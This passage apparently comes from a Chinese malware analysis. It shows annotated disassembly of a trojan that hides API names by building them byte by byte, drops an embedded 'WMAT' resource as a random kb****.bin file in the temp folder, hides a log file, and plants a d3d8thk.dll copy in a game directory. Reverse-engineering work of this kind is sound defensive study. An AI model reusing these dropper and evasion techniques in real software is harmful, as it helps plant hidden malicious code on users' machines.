复制失败则跳转 004033EB |. 395D C4 cmp dword ptr [ebp-3C], ebx 004033EE |. 0F84 D3000000 je 004034C7 004033F4 |. 8D45 E8 lea eax, dword ptr [ebp-18] 004033F7 |. C645 E8 47 mov byte ptr [ebp-18], 47 ; EAX = GetFileAttributesA 004033FB |. 50 push eax 004033FC |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; kernel32.dll 004033FF |. 50 push eax 00403400 |. C645 E9 65 mov byte ptr [ebp-17], 65 0040348F |. 885D DA mov byte ptr [ebp-26], bl 00403492 |. FFD6 call esi ; LoadLibraryA kernel32.dll 00403494 |. 50 push eax 00403495 |. E8 97E4FFFF call 00401931 ; GetProcAddress GetFileAttributesA 0040349A |. 59 pop ecx 0040349B |. 8BF8 mov edi, eax ; edi = GetFileAttributesA地址 0040349D |. 59 pop ecx 0040349E |. 8D45 C8 lea eax, dword ptr [ebp-38] ; SetFileAttributesA 004034A1 |. 50 push eax 004034A2 |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; kernel32.dll 004034A5 |. 50 push eax 004034A6 |. FFD6 call esi ; LoadLibraryA kernel32.dll 004034A8 |. 50 push eax 004034A9 |. E8 83E4FFFF call 00401931 ; GetProcAddress SetFileAttributesA 004034AE |. 59 pop ecx 004034AF |. 8BF0 mov esi, eax ; esi = SetFileAttributesA 地址 004034B1 |. 59 pop ecx 004034B2 |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4] 004034B8 |. 50 push eax ; mfc42.log 文件绝对路径 004034B9 |. FFD7 call edi ; GetFileAttributesA 004034BB |. 0C 02 or al, 2 ; 设置其隐藏属性 004034BD |. 50 push eax 004034BE |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4] 004034C4 |. 50 push eax 004034C5 |. FFD6 call esi ; SetFileAttributesA 004034C7 |> 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] ; kb****.axs 004034CD |. BE 1C704000 mov esi, 0040701C ; "d3d8thk.dll" 004034D2 |. 50 push eax 004034D3 |. 56 push esi 004034D4 |. E8 FEEEFFFF call 004023D7 ; 对"系统目录\d3d8thk.dll"进行复制和更改 004034D9 |. 0FB6C0 movzx eax, al 004034DC |. 59 pop ecx 004034DD |. 3BC3 cmp eax, ebx 004034DF |. 59 pop ecx 004034E0 |. 75 04 jnz short 004034E6 004034E2 |> 33C0 xor eax, eax 004034E4 |. EB 2D jmp short 00403513 004034E6 |> 395D C4 cmp dword ptr [ebp-3C], ebx 004034E9 |. 74 1E je short 00403509 004034EB |. 8D85 FCF6FFFF lea eax, dword ptr [ebp-904] ; buffer 004034F1 |. 50 push eax 004034F2 |. 8D85 00F8FFFF lea eax, dword ptr [ebp-800] 004034F8 |. 50 push eax ; 游戏目录 004034F9 |. 56 push esi ; "d3d8thk.dll" 004034FA |. E8 E61B0000 call 004050E5 ; 复制"系统目录\d3d8thk.dll.dat" 到 "游戏目录\d3d8thk.dll" 004034FF |. 0FB6C0 movzx eax, al ; 1 00403502 |. 83C4 0C add esp, 0C 00403505 |. 3BC3 cmp eax, ebx 00403507 |. 75 07 jnz short 00403510 ; 成功写入病毒代码,则跳转 00403509 |> 56 push esi ; "d3d8thk.dll" 0040350A |. E8 38160000 call 00404B47 0040350F |. 59 pop ecx 00403510 |> 6A 01 push 1 00403512 |. 58 pop eax 00403513 |> 5F pop edi 00403514 |. 5E pop esi 00403515 |. 5B pop ebx 00403516 |. C9 leave 00403517 \. C3 retn
在系统临时文件目录中释放一个名称为kb****.bin 的文件,其中*为0~9的随即数字
【第二段】
该段是第一段中的一个子过程
代码:
00402605 /$ 55 push ebp 00402606 |. 8BEC mov ebp, esp 00402608 |. 81EC C8010000 sub esp, 1C8 0040260E |. 53 push ebx 0040260F |. 56 push esi 00402610 |. 57 push edi 00402611 |. 6A 40 push 40 00402613 |. 33DB xor ebx, ebx 00402615 |. 59 pop ecx ; ecx = 0x40 00402616 |. 33C0 xor eax, eax 00402618 |. 8DBD 39FEFFFF lea edi, dword ptr [ebp-1C7] 0040261E |. 889D 38FEFFFF mov byte ptr [ebp-1C8], bl 00402624 |. 8B35 00604000 mov esi, dword ptr [<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA 0040262A |. F3:AB rep stos dword ptr es:[edi] 0040262C |. 66:AB stos word ptr es:[edi] 0040262E |. AA stos byte ptr es:[edi] 0040262F |. 8D45 F0 lea eax, dword ptr [ebp-10] 00402632 |. C645 E4 43 mov byte ptr [ebp-1C], 43 00402636 |. 50 push eax ; /FileName 00402637 |. C645 E5 72 mov byte ptr [ebp-1B], 72 ; |填充内容CreateFile 0040263B |. C645 E6 65 mov byte ptr [ebp-1A], 65 ; | 0040263F |. C645 E7 61 mov byte ptr [ebp-19], 61 ; | 00402643 |. C645 E8 74 mov byte ptr [ebp-18], 74 ; | 00402647 |. C645 E9 65 mov byte ptr [ebp-17], 65 ; | 0040264B |. C645 EA 46 mov byte ptr [ebp-16], 46 ; | 0040264F |. C645 EB 69 mov byte ptr [ebp-15], 69 ; | 00402653 |. C645 EC 6C mov byte ptr [ebp-14], 6C ; | 00402657 |. C645 ED 65 mov byte ptr [ebp-13], 65 ; | 0040265B |. C645 EE 41 mov byte ptr [ebp-12], 41 ; | 0040265F |. 885D EF mov byte ptr [ebp-11], bl ; | 00402662 |. C645 F0 4B mov byte ptr [ebp-10], 4B ; |填充内容kernel32.dll 00402666 |. C645 F1 65 mov byte ptr [ebp-F], 65 ; | 0040266A |. C645 F2 72 mov byte ptr [ebp-E], 72 ; | 0040266E |. C645 F3 6E mov byte ptr [ebp-D], 6E ; | 00402672 |. C645 F4 65 mov byte ptr [ebp-C], 65 ; | 00402676 |. C645 F5 6C mov byte ptr [ebp-B], 6C ; | 0040267A |. C645 F6 33 mov byte ptr [ebp-A], 33 ; | 0040267E |. C645 F7 32 mov byte ptr [ebp-9], 32 ; | 00402682 |. C645 F8 2E mov byte ptr [ebp-8], 2E ; | 00402686 |. C645 F9 64 mov byte ptr [ebp-7], 64 ; | 0040268A |. C645 FA 6C mov byte ptr [ebp-6], 6C ; | 0040268E |. C645 FB 6C mov byte ptr [ebp-5], 6C ; | 00402692 |. 885D FC mov byte ptr [ebp-4], bl ; | 00402695 |. FFD6 call esi ; \LoadLibraryA Kernel32.dll 00402697 |. 8BF8 mov edi, eax 00402699 |. 3BFB cmp edi, ebx 0040269B |. 0F84 6B030000 je 00402A0C ; 判断加载是否成功 004026A1 |. 8D45 A4 lea eax, dword ptr [ebp-5C] 004026A4 |. C645 A4 47 mov byte ptr [ebp-5C], 47 004026A8 |. 50 push eax 004026A9 |. 57 push edi 004026AA |. C645 A5 65 mov byte ptr [ebp-5B], 65 ; 填充GetTempPathA 004026AE |. C645 A6 74 mov byte ptr [ebp-5A], 74 004026B2 |. C645 A7 54 mov byte ptr [ebp-59], 54 004026B6 |. C645 A8 65 mov byte ptr [ebp-58], 65 004026BA |. C645 A9 6D mov byte ptr [ebp-57], 6D 004026BE |. C645 AA 70 mov byte ptr [ebp-56], 70 004026C2 |. C645 AB 50 mov byte ptr [ebp-55], 50 004026C6 |. C645 AC 61 mov byte ptr [ebp-54], 61 004026CA |. C645 AD 74 mov byte ptr [ebp-53], 74 004026CE |. C645 AE 68 mov byte ptr [ebp-52], 68 004026D2 |. C645 AF 41 mov byte ptr [ebp-51], 41 004026D6 |. 885D B0 mov byte ptr [ebp-50], bl 004026D9 |. E8 53F2FFFF call 00401931 ; GetProcAddress GetTempPathA 004026DE |. 59 pop ecx 004026DF |. 59 pop ecx 004026E0 |. 8D8D 38FEFFFF lea ecx, dword ptr [ebp-1C8] 004026E6 |. 51 push ecx ; Buffer 004026E7 |. 68 04010000 push 104 ; length = 0x104 004026EC |. FFD0 call eax 004026EE |. 85C0 test eax, eax 004026F0 |. 0F84 16030000 je 00402A0C ; 判断是否成功获取系统临时文件夹 004026F6 |. 8D45 94 lea eax, dword ptr [ebp-6C] 004026F9 |. C645 94 46 mov byte ptr [ebp-6C], 46 004026FD |. 50 push eax 004026FE |. 57 push edi 004026FF |. C645 95 69 mov byte ptr [ebp-6B], 69 ; 填充FindResourceA 00402806 |. E8 26F1FFFF call 00401931 ; GetProcAddress FindResourceA 0040280B |. 8985 5CFFFFFF mov dword ptr [ebp-A4], eax 00402811 |. 8D45 84 lea eax, dword ptr [ebp-7C] 00402814 |. 50 push eax 00402815 |. 57 push edi 00402816 |. E8 16F1FFFF call 00401931 ; GetProcAddress SizeofResource 0040281B |. 8985 64FFFFFF mov dword ptr [ebp-9C], eax 00402821 |. 8D45 B4 lea eax, dword ptr [ebp-4C] 00402824 |. 50 push eax 00402825 |. 57 push edi 00402826 |. E8 06F1FFFF call 00401931 ; GetProcAddress LoadResource 0040282B |. 8985 60FFFFFF mov dword ptr [ebp-A0], eax 00402831 |. 8D45 C4 lea eax, dword ptr [ebp-3C] 00402834 |. 50 push eax 00402835 |. 57 push edi 00402836 |. E8 F6F0FFFF call 00401931 ; GetProcAddress LockResource 0040283B |. 8985 74FFFFFF mov dword ptr [ebp-8C], eax 00402841 |. 8D45 D4 lea eax, dword ptr [ebp-2C] 00402844 |. 50 push eax 00402845 |. 57 push edi 00402846 |. E8 E6F0FFFF call 00401931 ; GetProcAddress FreeResource 0040284B |. 6A 07 push 7 0040284D |. 8985 68FFFFFF mov dword ptr [ebp-98], eax 00402853 |. 59 pop ecx ; ecx = 7 00402854 |. 33C0 xor eax, eax 00402856 |. 8DBD 3DFFFFFF lea edi, dword ptr [ebp-C3] 0040285C |. 53 push ebx ; /timer 0040285D |. F3:AB rep stos dword ptr es:[edi] ; | 0040285F |. 66:AB stos word ptr es:[edi] ; | 00402861 |. AA stos byte ptr es:[edi] ; | 00402862 |. C685 3CFFFFFF 6B mov byte ptr [ebp-C4], 6B ; |ebp - c4 是一char数组的首地址,这里是给前两个char填充内容kb 00402869 |. C685 3DFFFFFF 62 mov byte ptr [ebp-C3], 62 ; | 00402870 |. FF15 90604000 call dword ptr [<&MSVCRT.time>] ; \time 00402876 |. 50 push eax ; /seed 00402877 |. FF15 8C604000 call dword ptr [<&MSVCRT.srand>] ; \以当前时间作为种子取随即数 0040287D |. 83C4 30 add esp, 30 00402880 |. 6A 02 push 2 00402882 |. 5F pop edi ; 下面10句指令是一个小循环,给char数组的3~6位填充内容,范围1~9 00402883 |> FF15 88604000 /call dword ptr [<&MSVCRT.rand>] ; [rand 00402889 |. 6A 0A |push 0A 0040288B |. 99 |cdq 0040288C |. 59 |pop ecx ; ecx = 0x0a 0040288D |. F7F9 |idiv ecx ; eax = rand() / 0x0A 则 dl = 0 ~ 9 0040288F |. 80C2 30 |add dl, 30 ; 把dl加上0x30 则转换为相对应的ascii 码 00402892 |. 88943D 3CFFFFFF |mov byte ptr [ebp+edi-C4], dl ; 把值赋予int 数组 00402899 |. 47 |inc edi ; 下标加一 0040289A |. 83FF 06 |cmp edi, 6 0040289D |.^ 7C E4 \jl short 00402883 ; 循环 0040289F |. C6843D 3CFFFFFF 2E mov byte ptr [ebp+edi-C4], 2E ; 在char数组后添加元素0x2E '.' 004028A7 |. 47 inc edi 004028A8 |. 8D85 3CFFFFFF lea eax, dword ptr [ebp-C4] ; 数组地址 004028AE |. C6843D 3CFFFFFF 62 mov byte ptr [ebp+edi-C4], 62 ; 在char数组后添加元素0x62 'b' 004028B6 |. 47 inc edi ; 下标加一 004028B7 |. 50 push eax 004028B8 |. 8D85 38FEFFFF lea eax, dword ptr [ebp-1C8] ; eax = 临时文件目录 004028BE |. C6843D 3CFFFFFF 69 mov byte ptr [ebp+edi-C4], 69 ; 在char数组后添加元素0x69 'i' 004028C6 |. 47 inc edi 004028C7 |. 50 push eax 004028C8 |. C6843D 3CFFFFFF 6E mov byte ptr [ebp+edi-C4], 6E ; 在char数组后添加元素0x6E 'n' 004028D0 |. 889C3D 3DFFFFFF mov byte ptr [ebp+edi-C3], bl ; 在最后补0 004028D7 |. E8 69EEFFFF call 00401745 ; 获取系统临时文件路径,在路径后追加刚刚随即生成的文件名的.bin 004028DC |. 8D85 38FEFFFF lea eax, dword ptr [ebp-1C8] 004028E2 |. 50 push eax ; 压入文件绝对路径 004028E3 |. FF75 08 push dword ptr [ebp+8] ; 压入buffer 指针 004028E6 |. E8 63EDFFFF call 0040164E ; 此函数把生成的文件绝对路径复制到堆空间中 004028EB |. 83C4 10 add esp, 10 004028EE |. 899D 70FFFFFF mov dword ptr [ebp-90], ebx 004028F4 |. 53 push ebx ; /pModule 004028F5 |. FF15 04604000 call dword ptr [<&kernel32.GetModuleHandleA>] ; \获取当前进程的HMODULE 004028FB |. FF75 0C push dword ptr [ebp+C] ; "WMAT" 004028FE |. 8BF8 mov edi, eax 00402900 |. FF75 10 push dword ptr [ebp+10] ; 0x75 00402903 |. 57 push edi 00402904 |. FF95 5CFFFFFF call dword ptr [ebp-A4] ; FindResourceA 获取名为WMAT的资源 0040290A |. 8945 08 mov dword ptr [ebp+8], eax 0040290D |. 50 push eax 0040290E |. 58 pop eax 0040290F |. 395D 08 cmp dword ptr [ebp+8], ebx 00402912 |. 0F84 F4000000 je 00402A0C ; 判断是否为NULL 00402918 |. FF75 08 push dword ptr [ebp+8] ; 压入WMAT资源首地址 0040291B |. 57 push edi ; 压入模块基址 0040291C |. FF95 60FFFFFF call dword ptr [ebp-A0] ; LoadResource 加载资源到全局空间 00402922 |. 3BC3 cmp eax, ebx 00402924 |. 8945 0C mov dword ptr [ebp+C], eax 00402927 |. 0F84 DF000000 je 00402A0C ; 判断LoadResource是否成功 0040292D |. 50 push eax ; 传入资源的内存地址 0040292E |. FF95 74FFFFFF call dword ptr [ebp-8C] ; SetHandleCount 这个地方应该是传参错误,不过没什么影响 00402934 |. 3BC3 cmp eax, ebx 00402936 |. 8985 74FFFFFF mov dword ptr [ebp-8C], eax 0040293C |. 0F84 D8000000 je 00402A1A ; 判断SetHandleCount结果 00402942 |. FF75 08 push dword ptr [ebp+8] ; 资源地址 00402945 |. 57 push edi ; HMODULE 00402946 |. FF95 64FFFFFF call dword ptr [ebp-9C] ; SizeofResource 获取资源大小 0040294C |. 8945 10 mov dword ptr [ebp+10], eax ; 大小为0x5200 0040294F |. 8D45 E4 lea eax, dword ptr [ebp-1C] ; eax = "CreateFileA" 00402952 |. 50 push eax 00402953 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; eax = "Kernel32.dll" 00402956 |. 50 push eax 00402957 |. FFD6 call esi ; LoadLibraryA Kernel32.dll 00402959 |. 50 push eax 0040295A |. E8 D2EFFFFF call 00401931 ; GetProcAddress 获取CreateFileA函数地址 0040295F |. 59 pop ecx 00402960 |. 8BF8 mov edi, eax 00402962 |. 59 pop ecx 00402963 |. 8D85 78FFFFFF lea eax, dword ptr [ebp-88] 00402969 |. 50 push eax ; 先压入地址,然后再填充其内容 0040296A |. 8D45 F0 lea eax, dword ptr [ebp-10] 0040296D |. 50 push eax 0040296E |. C685 78FFFFFF 43 mov byte ptr [ebp-88], 43 ; 填充的内容为CloseHandle 00402975 |. C685 79FFFFFF 6C mov byte ptr [ebp-87], 6C 0040297C |. C685 7AFFFFFF 6F mov byte ptr [ebp-86], 6F 00402983 |. C685 7BFFFFFF 73 mov byte ptr [ebp-85], 73 0040298A |. C685 7CFFFFFF 65 mov byte ptr [ebp-84], 65 00402991 |. C685 7DFFFFFF 48 mov byte ptr [ebp-83], 48 00402998 |. C685 7EFFFFFF 61 mov byte ptr [ebp-82], 61 0040299F |. C685 7FFFFFFF 6E mov byte ptr [ebp-81], 6E 004029A6 |. C645 80 64 mov byte ptr [ebp-80], 64 004029AA |. C645 81 6C mov byte ptr [ebp-7F], 6C 004029AE |. C645 82 65 mov byte ptr [ebp-7E], 65 004029B2 |. 885D 83 mov byte ptr [ebp-7D], bl 004029B5 |. FFD6 call esi ; LoadLibraryA Kernel32.dll 004029B7 |. 50 push eax 004029B8 |. E8 74EFFFFF call 00401931 ; GetProcAddress CloseHandle 004029BD |. 59 pop ecx 004029BE |. 8945 08 mov dword ptr [ebp+8], eax 004029C1 |. 59 pop ecx 004029C2 |. 8D85 38FEFFFF lea eax, dword ptr [ebp-1C8] 004029C8 |. 53 push ebx ; 0 004029C9 |. 53 push ebx ; 0 004029CA |. 6A 02 push 2 004029CC |. 53 push ebx ; 0 004029CD |. 53 push ebx ; 0 004029CE |. 68 000000C0 push C0000000 004029D3 |. 50 push eax ; 文件的绝对路径 文件名kb****.bin *的范围0~9 004029D4 |. FFD7 call edi ; CreateFileA 004029D6 |. 8BF0 mov esi, eax 004029D8 |. 83FE FF cmp esi, -1 004029DB |. 74 39 je short 00402A16 ; 判断创建文件是否成功 004029DD |. 8D85 6CFFFFFF lea eax, dword ptr [ebp-94] 004029E3 |. 53 push ebx ; /pOverlapped 004029E4 |. 50 push eax ; |pBytesWritten 004029E5 |. FF75 10 push dword ptr [ebp+10] ; |nBytesToWrite 004029E8 |. FFB5 74FFFFFF push dword ptr [ebp-8C] ; |资源地址 004029EE |. 56 push esi ; |hFile 004029EF |. FF15 10604000 call dword ptr [<&kernel32.WriteFile>] ; \WriteFile 把资源文件转存到创建的文件中 004029F5 |. 3BC3 cmp eax, ebx 004029F7 |. 8985 70FFFFFF mov dword ptr [ebp-90], eax 004029FD |. 56 push esi 004029FE |. 75 10 jnz short 00402A10 ; 写入成功则跳转 00402A00 |. FF55 08 call dword ptr [ebp+8] ; 否则CloseHandle 00402A03 |. FF75 0C push dword ptr [ebp+C] ; 压入资源地址 00402A06 |. FF95 68FFFFFF call dword ptr [ebp-98] ; FreeResource 释放资源 此API已废弃 00402A0C |> 33C0 xor eax, eax 00402A0E |. EB 19 jmp short 00402A29 00402A10 |> FF15 0C604000 call dword ptr [<&kernel32.FlushFileBuffers>] ; \完成写入操作 00402A16 |> 56 push esi 00402A17 |. FF55 08 call dword ptr [ebp+8] ; CloseHandle 关闭文件handle 00402A1A |> FF75 0C push dword ptr [ebp+C] 00402A1D |. FF95 68FFFFFF call dword ptr [ebp-98] ; FreeResource 释放资源 00402A23 |. 8B85 70FFFFFF mov eax, dword ptr [ebp-90] 00402A29 |> 5F pop edi 00402A2A |. 5E pop esi 00402A2B |. 5B pop ebx 00402A2C |. C9 leave 00402A2D \. C3 retn